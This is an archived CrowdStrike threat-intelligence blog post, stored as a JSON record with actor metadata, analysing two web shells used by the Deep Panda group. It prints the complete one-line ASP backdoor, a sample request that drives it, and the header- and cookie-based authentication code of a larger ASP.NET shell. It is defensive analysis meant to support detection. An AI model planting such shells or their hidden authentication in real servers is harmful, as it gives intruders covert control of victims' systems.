{
	"id": "4c6ca311-41ee-4ea9-b78a-94886b349952",
	"created_at": "2026-04-06T00:09:57.431451Z",
	"updated_at": "2026-04-10T13:13:02.174301Z",
	"deleted_at": null,
	"sha1_hash": "78d8c0fb0fdf7cf830f19e88397acdf1b781974c",
	"title": "Mo' Shells Mo' Problems - Deep Panda Web Shells - crowdstrike.com",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 133212,
	"plain_text": "Mo' Shells Mo' Problems - Deep Panda Web Shells -\r\ncrowdstrike.com\r\nBy RyanJ\r\nArchived: 2026-04-05 16:40:13 UTC\r\nDisclaimer: CrowdStrike derived this information from investigations in non-classified environments.\r\nSince we value our client's privacy and interests, some data has been redacted or sanitized.\r\nCrowdstrike presents “Mo’ Shells Mo’ Problems” - A four part series featuring two unique web shells used by a\r\nChinese threat group we call Deep Panda. The series will culminate with a CrowdCast in April 2014 detailing a\r\ncase study of the incident response investigation conducted to identify these web shells. Special thanks to Josh\r\nPhillips of the CrowdStrike Global Intelligence Team for providing the technical analysis in this blog post. Today\r\nwe’ll cover part one of this series, which provides an overview of what web shells are, functionality of two web\r\nshells recently identified during an incident response investigation and how they were leveraged by the attacker.\r\nParts two through four will provide details on successful analytical techniques you can use to discover web shells\r\nwithin your environment:\r\nMo’ Shells Mo’ Problems: Deep Panda Web Shells (Part 1)\r\nMo’ Shells Mo’ Problems: File Stacking (Part 2)\r\nMo’ Shells Mo’ Problems: Web Log Review (Part 3)\r\nMo’ Shells Mo’ Problems: Network Detection (Part 4)\r\nA Web Shell is a file containing backdoor functionality written in a web scripting language such ASP, ASPX, PHP\r\nor JSP.\r\nWhen a web shell is hosted on an internet facing victim system, an adversary can remotely access the system to\r\nperform malicious actions.\r\nDeep Panda is a China-based threat group CrowdStrike has observed targeting companies in the defense, legal,\r\ntelecommunication and financial industries.\r\nCrowdstrike has observed Deep Panda adopting web shells as their primary access back into a victim\r\norganization.\r\nThis is an interesting shift as web shells have typically 
been seen as only a first stage into obtaining a persistent foothold in an environment.\r\nPreviously, web shells were quickly abandoned once persistent second-stage malware was successfully beaconing.\r\nUsing a web shell as a primary backdoor gives Deep Panda several advantages:\r\nLow to virtually no detection by antivirus products\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 1 of 6\r\nThe absence of command and control beacon traffic\r\nImpossible to block known malicious IP addresses at the web server, since the adversary can easily change their source IP address\r\nWeb shells that authenticate via cookies and HTTP headers avoid being enumerated by search engines and restrict access, further reducing their network footprint\r\nTo assist organizations with identifying web shells in their environment, this post will cover two popular Deep Panda web shells.\r\nBy gaining insight into their capabilities and footprint, organizations should find it feasible to detect and remediate these backdoors.\r\nShowimg.asp\r\nPath: E:\\inetpub\\wwwroot\\\u003cRedacted\u003e\r\nMD5 Hash: ffa82c64720179878b25793f17b304d7\r\nFile Size: 28\r\nTable 1: \"Showimg.asp\" Metadata\r\nShowimg.asp is an example of an early-stage web shell used to build an initial foothold within a network.\r\nAfter it is replaced by more robust backdoors, it may be left in place as a last resort should remediation take place.\r\nAt a diminutive 28 bytes, it is one of the smallest Active Server Pages (ASP) backdoors in the wild.\r\nIn a recent case, we witnessed this web shell written to a standalone file (named showimg.asp), but it could easily be injected into an existing page, making it even stealthier.\r\nThe code for this web shell can be found below:\r\n\u003c%execute request(chr(42))%\u003e\r\nTable 2: \"Showimg.asp\" Web Shell Script\r\nASP uses Microsoft VBScript (Visual Basic Scripting Edition) as its implementation language.\r\nThe code above uses the chr() function to convert an integer into a character, which is then passed as an argument to the ASP Request() object. The Request() object will search the query string for any keys matching the input. In our case, the code is equivalent to Request.QueryString(‘*’).\r\nThe Request object will look for chr(42), which is an asterisk (*), returning whatever is passed to it in an HTTP GET or POST. Next, the Execute() function will execute any value returned by the lookup.\r\nEffectively, an attacker can form a request that will execute any VBScript code.\r\nAs you might imagine, this is a powerful capability.\r\nFor example, this code can perform any of the following actions:\r\nFile upload or download\r\nFile system read, write, or delete\r\nArbitrary command execution\r\nThis web shell is an example of a “thick client” shell, meaning that while the server-side code is quite small, attackers typically use a larger GUI client to construct the sent commands.\r\nThe client GUI runs on the attacker’s system and hence is not typically found within the victim network.\r\nAs a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“\u003ch1\u003eHello World\u003c/h1\u003e”) and would cause “Hello World” to be printed in the web browser:\r\nhttp://\u003cwebserver\u003e/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29\r\nTable 3: \"showimg.asp\" Web Shell Script\r\nSystem_web.aspx\r\nPath: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\\u003cVERSION\u003e\r\nMD5 Hash: cc875db104a602e6c12196fe90559fb6\r\nFile Size: 45187\r\nTable 4: Metadata of \"system_web.aspx\"\r\nSystem_web.aspx is an excellent example of a more robust web shell used to replace Deep Panda’s traditional beaconing command and control infrastructure.\r\nIt is an ASP.NET backdoor written in C#, with far more capabilities than we saw with the showimage.asp sample.\r\nThe web shell supports a form of authentication to protect against unauthorized access.\r\nThis prevents its discovery by search engine indexing, vulnerability scanning tools and other unauthorized access to the backdoor.\r\nIn order to pass authentication, a user session must meet one of three conditions:\r\nPass a cookie with the name \u003cRedacted\u003e\r\nSet the Keep-Alive HTTP header to 320\r\nSet the language (Accept-Language) HTTP header to contain es-DN\r\nSince web shells are text-based, we can easily see how this authentication takes place:\r\ntry\r\n{\r\n    Init();\r\n    if (!IsUserValid())\r\n    {\r\n        try\r\n        {\r\n            int.Parse(Request.Cookies[\"REDACTED\"].Value);\r\n            Page.Visible = true;\r\n        }\r\n        catch (Exception)\r\n        {\r\n            Page.Visible = false;\r\n            Response.Clear();\r\n            Response.End();\r\n        }\r\n    }\r\n    else\r\n    {\r\n        Page.Visible = true;\r\n        Response.SetCookie(new HttpCookie(\"REDACTED\", DateTime.Now.Second.ToString()));\r\n    }\r\n}\r\ncatch (Exception)\r\n{\r\n    Page.Visible = false;\r\n    Response.End();\r\n}\r\nprivate void Init()\r\n{\r\n    try\r\n    {\r\n        if (Request.Cookies[\"cp\"] != null)\r\n        {\r\n            File.Copy(Request.PhysicalPath, Request.Cookies[\"cp\"].Value, true);\r\n            Response.Cookies[\"cp\"].Expires = DateTime.Now.AddDays(-1);\r\n            Response.End();\r\n        }\r\n    }\r\n    catch (Exception ex)\r\n    {\r\n        Log(ex.ToString());\r\n    }\r\n}\r\nprivate bool IsUserValid()\r\n{\r\n    try\r\n    {\r\n        if (Request.Headers[\"Keep-Alive\"] == \"320\")\r\n            return true;\r\n        if (Request.UserLanguages.Length \u003e 0)\r\n        {\r\n            foreach (string s in Request.UserLanguages)\r\n            {\r\n                if (s.IndexOf(\"es-DN\") \u003e= 0)\r\n                    return true;\r\n            }\r\n        }\r\n    }\r\n    catch (Exception)\r\n    {\r\n        return false;\r\n    }\r\n    return false;\r\n}\r\nTable 5: \"system_web.aspx\" Authentication Code\r\nFirst, the code checks if a cookie by the name of cp exists. If so, the web shell copies its own file (Request.PhysicalPath) to the path given in the cookie value, expires the cookie and invokes the response object's End() method, denying the user access.\r\nNext, the code calls the IsUserValid() method, which checks the Hypertext Transfer Protocol (HTTP) headers for the Keep-Alive value and, if it equals 320, returns true. If the value does not equal 320, the IsUserValid() method iterates over the Request.UserLanguages collection searching for a language containing es-DN, and if one is found, returns true. If neither check passes, the method returns false and the code will finally check for the presence of a cookie named \u003cREDACTED\u003e. If the cookie is present (and its value parses as an integer), the authentication step is satisfied.\r\nIf not, a blank web page with no content is displayed. After successful authentication, the attacker is provided with the following page:\r\nSystem_web.aspx packs a large amount of functionality into a compact interface.\r\nIt provides the following capabilities:\r\nEnumerate attached drives\r\nUtilize built-in SQL functions to connect to a database backend\r\nRun SQL queries and statements\r\nDownload, upload and read files\r\nDirectory listing\r\nExecute Active Directory requests\r\nCompile and execute arbitrary C# source code\r\nImpersonate a user\r\nThe web shell supports 8 main commands, with most command execution via Transact-SQL using the xp_cmdshell function.\r\nExec - This command depends on the contents of the first unlabeled textbox (textbox1). If textbox1 is empty, the code will enumerate attached drives.\r\n  Provider= or Driver= - Will connect using the OleDbConnection class.\r\n  Data Source= - The code will connect using the SqlConnection class.\r\n  iis:// - If this appears in textbox1, the code will use data from the second unlabeled textbox (textbox2) to execute Active Directory requests.\r\nDown - This command also depends on the text contained in textbox1. If the field is left empty, the code will assume a valid path to a file on the local machine and will read and display its contents to the user.\r\n  Data Source= - The code will assume that textbox2 contains a valid SQL query, execute it and display the results.\r\n  http:// - If this appears in textbox1, download content from the assumed URL.\r\n  $SEX - If this appears in textbox1, pass the contents to the Server.Execute() method.\r\nBF - Execute the contents of textbox1 as a SQL query and return binary data to the adversary.\r\nGF - Execute the contents of textbox1 as a SQL statement and return valid textual data to the adversary.\r\nTF - Upload the file chosen by the Choose File button and save it to a temporary table in the database file worktbl in chunks of 10240 bytes. It then executes xp_cmdshell (which executes the Bulk Copy Program) to copy the data from that table to a file whose name is specified in textbox2. After the file is saved, the code deletes the temporary table.\r\nRF - If textbox1 is a local file on the infected system, the file is read and displayed to the attacker.\r\n  \\ - If textbox1 starts with \\, use xp_cmdshell to execute the copy command to copy the file to %windir%\\Temp\\temp.bin. Then issue the dir command and display the results to the user. Finally, delete the temporary file %windir%\\Temp\\temp.bin.\r\nDIR - Perform Active Directory queries. The code handles create, delete, set, get, and enum queries, while any query not matching those is executed directly. All commands are executed using the System.DirectoryServices API.\r\nEva - Simple wrapper around the CSharpCodeProvider API, allowing the adversary to compile and execute arbitrary C# source code.\r\nLogin Checkbox - Attempt to use the username, password, and domain from the User, Pass and Domain fields and the LogonUserA() Win32 API function to impersonate a specific user.\r\nDetach Checkbox - Specifies whether commands run from the Exec button will have their output redirected and displayed to the adversary when the command is finished executing.\r\nIn short, system_web.aspx provides an adversary with a very stealthy means of near-full control of the server on which it resides.\r\nThis stealth might be its most important attribute.\r\nAs we will see, identifying web shells can be much harder than finding malicious binaries.\r\nIn our next post, we will discuss techniques for identifying web shells. Stay tuned for Parts 2-4 as we cover File Stacking, Web Log Review, and Network Detection. In the meantime, register now for the April 1st CrowdCast.\r\nSource: http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/"
	],
	"report_names": [
		"mo-shells-mo-problems-deep-panda-web-shells"
	],
	"threat_actors": [
		{
			"id": "64ca1755-3883-4173-8e0a-6e5cf92faafd",
			"created_at": "2022-10-25T15:50:23.636456Z",
			"updated_at": "2026-04-10T02:00:05.389234Z",
			"deleted_at": null,
			"main_name": "Deep Panda",
			"aliases": [
				"Deep Panda",
				"Shell Crew",
				"KungFu Kittens",
				"PinkPanther",
				"Black Vine"
			],
			"source_name": "MITRE:Deep Panda",
			"tools": [
				"Mivast",
				"StreamEx",
				"Sakula",
				"Tasklist",
				"Derusbi"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d",
			"created_at": "2025-08-07T02:03:24.595597Z",
			"updated_at": "2026-04-10T02:00:03.740023Z",
			"deleted_at": null,
			"main_name": "BRONZE FIRESTONE",
			"aliases": [
				"APT19 ",
				"C0d0s0",
				"Checkered Typhoon ",
				"Chlorine ",
				"Deep Panda ",
				"Pupa ",
				"TG-3551 "
			],
			"source_name": "Secureworks:BRONZE FIRESTONE",
			"tools": [
				"9002",
				"Alice's Rabbit Hole",
				"Cobalt Strike",
				"Derusbi",
				"PlugX",
				"PoisonIvy",
				"PowerShell Empire",
				"Trojan Briba",
				"Zuguo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434197,
	"ts_updated_at": 1775826782,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/78d8c0fb0fdf7cf830f19e88397acdf1b781974c.pdf",
		"text": "https://archive.orkl.eu/78d8c0fb0fdf7cf830f19e88397acdf1b781974c.txt",
		"img": "https://archive.orkl.eu/78d8c0fb0fdf7cf830f19e88397acdf1b781974c.jpg"
	}
}